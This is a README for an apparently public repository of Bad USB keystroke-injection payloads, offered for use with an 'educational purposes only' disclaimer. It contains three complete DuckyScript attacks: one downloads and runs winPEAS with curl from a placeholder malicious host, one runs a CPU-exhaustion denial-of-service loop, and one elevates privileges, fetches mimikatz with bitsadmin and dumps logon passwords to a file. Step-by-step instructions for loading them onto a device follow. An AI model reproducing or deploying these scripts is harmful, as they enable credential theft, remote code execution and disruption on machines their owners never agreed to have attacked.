Welcome to the Payloads repository, your go-to source for a collection of payloads designed for Bad USB attacks and more. Whether you're interested in testing security measures, learning about USB-based attacks, or conducting ethical hacking experiments, this repository offers a curated selection of payloads to meet your needs.
- ๐ Table of Contents
- ๐ Overview
- โ๏ธ Features
- ๐พ List of Bad USB scripts
- ๐ Getting Started
- ๐ค Contributing
- ๐ License
- ๐ Acknowledgments
Payload represents the core and often malicious component of code or an attack that is responsible for executing specific actions on a target system. These actions can range from gaining unauthorized access, extracting sensitive data, to compromising the integrity of the targeted software or hardware. Payloads are typically designed to exploit vulnerabilities and are delivered via various means, including email attachments, compromised files, or even physical devices such as USB drives.
BadUSB is a computer security attack using USB devices that are programmed with malicious software.For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a malicious device. This attack works by programming the fake USB flash drive to emulate a keyboard, which once plugged into a computer, is automatically recognized and allowed to interact with the computer, and can then initiate a series of keystrokes which open a command window and issue commands to download malware.
This script performs the delivery and execution of a potentially malicious file (winPEAS.exe) from a remote location. Its intent, is to open a Command Line on a target Windows system and then fetch via curl and run a payload from a specified URL.
REM Title: Bad USB - winPEAS payload delivered by curl
REM Author: DannnyzZ
REM Date: 10.15.2023
REM Description: Opens commandline, then curls payload from github repository
REM Target: Windows 10/11 (cmd)
REM Version: 1.0
REM Pause for everything to recognize and be ready
DELAY 2000
REM Open Command Line
CTRL ESC
DELAY 750
STRING cmd
DELAY 250
ENTER
DELAY 1000
ENTER
REM Execute curl payload from link
@echo off
REM Input command
STRING @echo off && set "downloadURL=https://www.malicious.com/winPEAS.exe" && set "downloadPath=%USERPROFILE%\winPEAS.exe" && set "runCommand=%USERPROFILE%\winPEAS.exe"
ENTER
DELAY 750
STRING curl -LJO "%downloadURL%" && move "winPEAS.exe" "%downloadPath%" && start "" "%runCommand%"
ENTERThe technical intent of this script is to cause a denial of service (DoS) condition by exhausting the target system's CPU, making it unresponsive and potentially leading to system instability. This type of attack is disruptive and can cause significant disruption to the target system's operation.
REM Title: Bad USB - DoS - processor exhaustion
REM Author: DannnyzZ
REM Date: 10.15.2023
REM Description: Opens commandline, then executes PC stress test.
REM Target: Windows 10/11 (cmd)
REM Version: 1.0
REM Pause for everything to recognize and be ready
DELAY 2000
REM Open Command Line
CTRL ESC
DELAY 750
STRING cmd
DELAY 250
ENTER
DELAY 1000
ENTER
REM Input command
STRING for /l %i in (1,1,1000000) do echo. 2^32 | find /r ".*"
ENTERThis script is a malicious payload designed to harvest login credentials from the target system using Mimikatz. The script delivers Mimikatz via BITSAdmin and then runs it to capture login passwords and save them to a file.
REM Title: Bad USB - Mimikatz payload delivered by BITSAdmin
REM Author: DannnyzZ
REM Date: 10.15.2023
REM Description: MIMIKATZ drop credentials on desktop
REM Target: Windows 10/11 (cmd)
REM Version: 1.0
REM Pause for everything to recognize and be ready
DELAY 2000
REM Elevate priviledges
DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT t
DELAY 750
ENTER
DELAY 500
STRING bitsadmin /transfer "mimikatz" /download /priority foreground "https://www.malicious.com/mimikatz.exe" "C:\Users\Public\mimikatz.exe"
ENTER
DELAY 3000
REM Execute commands in mimikatz
STRING start C:\Users\Public\mimikatz.exe
ENTER
DELAY 500
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonpasswords >> C:\Users\Public\dump.txt
ENTER
DELAY 1000Before you begin, ensure that you have the following:
1. USB Rubber Ducky, Malduino, any other Bad USB device
2. SD Card adapter
3. Internet connection
- Choose payload in .txt extension, and copy its contents
- Go to the site below and paste it there:
https://payloadstudio.hak5.org/community/- Generate payload out of text (it will be in .bin extension)
- Store finished payload on any Bad USB of your choice.
The owner of this GitHub repository takes no responsibility for the use of the payloads provided. It is essential to understand that the owner disclaims any liability for their use, and these payloads are intended for educational purposes only.
Contributions are always welcome! Please follow these steps:
- Fork the project repository. This creates a copy of the project on your account that you can modify without affecting the original project.
- Clone the forked repository to your local machine using a Git client like Git or GitHub Desktop.
- Create a new branch with a descriptive name (e.g.,
NEW_FIX).
git checkout -b NEW_FIX- Make changes to the project's codebase.
- Commit your changes to your local branch with a clear commit message that explains the changes you've made.
git commit -m 'Applied changes.'- Push your changes to your forked repository on GitHub using the following command
git push origin NEW_FIX- Create a new pull request to the original project repository. In the pull request, describe the changes you've made and why they're necessary. The project maintainers will review your changes and provide feedback or merge them into the main branch.
This project is licensed under the โน๏ธ MIT License.
โน๏ธ Hak5 PayloadStudio
โน๏ธ Ducktoolkit
โน๏ธ ChatGPT 4.0
โน๏ธ Mimikatz
โน๏ธ winPEAS
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent